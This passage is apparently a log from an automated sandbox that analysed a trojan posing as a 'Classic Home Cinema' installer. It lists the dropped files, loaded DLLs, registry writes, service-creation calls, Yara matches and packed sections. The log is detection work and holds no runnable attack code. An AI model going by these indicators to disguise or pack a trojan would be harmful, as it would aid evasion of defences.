                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: String function: 00AD2A00 appears 135 times
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: String function: 00AC7750 appears 32 times
                    Source: EQ5Vcf19u8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: EQ5Vcf19u8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: EQ5Vcf19u8.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: classichomecinema.exe.1.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                    Source: is-G4VDT.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-G4VDT.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-G4VDT.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: ClassicHomeCinema.exe.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                    Source: is-7MGOG.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: sqlite3.dll.2.drStatic PE information: Number of sections : 19 > 10
                    Source: EQ5Vcf19u8.exe, 00000000.00000003.1694370826.0000000002088000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs EQ5Vcf19u8.exe
                    Source: EQ5Vcf19u8.exe, 00000000.00000003.1694235169.0000000002300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs EQ5Vcf19u8.exe
                    Source: EQ5Vcf19u8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal80.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ABF8C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,2_2_00ABF8C0
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: CreateServiceA,2_2_004021BD
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0046E0E4 GetVersion,CoCreateInstance,1_2_0046E0E4
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_0040D758 StartServiceCtrlDispatcherA,2_2_0040D758
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_0040D758 StartServiceCtrlDispatcherA,2_2_0040D758
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeFile created: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmpJump to behavior
                    Source: Yara matchFile source: 2.0.classichomecinema.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.1706052559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3556080703.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-1OQ1J.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: classichomecinema.exe, classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: classichomecinema.exe, classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: classichomecinema.exe, classichomecinema.exe, 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-7MGOG.tmp.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: EQ5Vcf19u8.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: EQ5Vcf19u8.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeFile read: C:\Users\user\Desktop\EQ5Vcf19u8.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\EQ5Vcf19u8.exe "C:\Users\user\Desktop\EQ5Vcf19u8.exe"
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp "C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp" /SL5="$20478,3086842,56832,C:\Users\user\Desktop\EQ5Vcf19u8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe "C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe" -i
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp "C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp" /SL5="$20478,3086842,56832,C:\Users\user\Desktop\EQ5Vcf19u8.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpProcess created: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe "C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe" -iJump to behavior
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Classic Home Cinema_is1Jump to behavior
                    Source: EQ5Vcf19u8.exeStatic file information: File size 3335813 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-T75LM.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-E3J5R.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-T75LM.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-RQ64T.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-E3J5R.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeUnpacked PE file: 2.2.classichomecinema.exe.400000.0.unpack .amtt4:ER;.antt4:R;.aott4:W;.rsrc:R;.aptt4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeUnpacked PE file: 2.2.classichomecinema.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .amtt4
                    Source: classichomecinema.exe.1.drStatic PE information: section name: .amtt4
                    Source: classichomecinema.exe.1.drStatic PE information: section name: .antt4
                    Source: classichomecinema.exe.1.drStatic PE information: section name: .aott4
                    Source: classichomecinema.exe.1.drStatic PE information: section name: .aptt4
                    Source: is-RQ64T.tmp.1.drStatic PE information: section name: Shared
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /4
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /19
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /35
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /51
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /63
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /77
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /89
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /102
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /113
                    Source: is-7MGOG.tmp.1.drStatic PE information: section name: /124
                    Source: ClassicHomeCinema.exe.2.drStatic PE information: section name: .amtt4
                    Source: ClassicHomeCinema.exe.2.drStatic PE information: section name: .antt4
                    Source: ClassicHomeCinema.exe.2.drStatic PE information: section name: .aott4
                    Source: ClassicHomeCinema.exe.2.drStatic PE information: section name: .aptt4
                    Source: sqlite3.dll.2.drStatic PE information: section name: /4
                    Source: sqlite3.dll.2.drStatic PE information: section name: /19
                    Source: sqlite3.dll.2.drStatic PE information: section name: /35
                    Source: sqlite3.dll.2.drStatic PE information: section name: /51
                    Source: sqlite3.dll.2.drStatic PE information: section name: /63
                    Source: sqlite3.dll.2.drStatic PE information: section name: /77
                    Source: sqlite3.dll.2.drStatic PE information: section name: /89
                    Source: sqlite3.dll.2.drStatic PE information: section name: /102
                    Source: sqlite3.dll.2.drStatic PE information: section name: /113
                    Source: sqlite3.dll.2.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx1_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx1_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
